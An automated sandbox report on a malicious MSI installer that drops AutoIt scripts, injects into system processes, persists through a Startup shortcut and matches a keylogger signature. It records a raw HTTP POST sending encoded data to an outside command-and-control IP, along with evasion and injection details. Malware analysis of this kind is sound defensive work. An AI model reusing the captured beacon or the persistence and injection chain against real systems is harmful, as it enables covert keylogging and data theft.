Edit tour

Windows Analysis Report
15e7232gfN.msi

Overview

General Information

Sample Name:	15e7232gfN.msi
Original Sample Name:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
Analysis ID:	1280109
MD5:	247a8cc39384e93d258360a11381000f
SHA1:	23893f035f8564dfea5030b9fdd54120d96072bb
SHA256:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Creates a thread in another existing process (thread injection)

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

AV process strings found (often used to terminate AV products)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Creates a start menu entry (Start Menu\Programs\Startup)

Yara detected Keylogger Generic

Checks for available system drives (often done to infect USB drives)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 4764 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 7100 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

icacls.exe (PID: 7068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

expand.exe (PID: 5484 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Autoit3.exe (PID: 4108 cmdline: "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cmd.exe (PID: 4696 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

OLicenseHeartbeat.exe (PID: 3132 cmdline: C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe MD5: CFD37109A4E595C2957C5E0ACC198E8A)

icacls.exe (PID: 6980 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Autoit3.exe (PID: 7204 cmdline: "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cmd.exe (PID: 7404 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

ADelRCP.exe (PID: 8100 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

SciTE.exe (PID: 7396 cmdline: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe MD5: 91EE39F4A80F60A938095424EEF2C709)

msinfo32.exe (PID: 5644 cmdline: C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe MD5: 29F917BF3DE95D7CE5B6B38CB7A895AB)

MyProg.exe (PID: 8056 cmdline: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe MD5: FE48113F3A78F980634E8CDACABF5091)

ADelRCP.exe (PID: 8016 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8024 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8032 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8040 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8048 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8064 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8072 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

ADelRCP.exe (PID: 8080 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Autoit3.exe PID: 4108	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 4696	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Autoit3.exe PID: 7204	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 7404	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: SciTE.exe PID: 7396	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 658Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00428238 recv,

Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SciTE.exe PID: 7396, type: MEMORYSTR

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIDAD.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\5f09c5.msi

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004222B4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045652C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00456778

Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00404500 appears 50 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00404554 appears 55 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 004049DC appears 65 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00406B98 appears 77 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00446258 appears 33 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00455C58 appears 539 times

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: C:\Windows\SysWOW64\icacls.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: unknown	Process created: C:\ProgramData\fkeabad\Autoit3.exe "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Source: aafaecg.lnk.9.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\fkeabad\Autoit3.exe

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFB7831024D2CFB248.TMP

Jump to behavior

Source: classification engine

Classification label: mal64.troj.evad.winMSI@51/27@0/1

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00450548 GetDiskFreeSpaceExA,

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00432F64 CreateToolhelp32Snapshot,

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 15e7232gfN.msi

Static file information: File size 1921024 > 1048576

Source:	Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042806C push 00428098h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004460F8 push 0044613Ah; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043E098 push 0043E0C4h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0044C0B4 push 0044C10Bh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042C164 push 0042C272h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004201D0 push 004201FCh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041E1F8 push 0041E21Eh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042A27C push 0042A2EBh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042A208 push 0042A279h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041E2C4 push 0041E2EAh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A2B0 push 0043A2DCh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00444340 push 0044438Ch; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A350 push 0043A37Ch; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A318 push 0043A344h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A3C0 push 0043A3ECh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004443E4 push 00444410h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A3F8 push 0043A424h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A388 push 0043A3B4h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00444398 push 004443DAh; ret
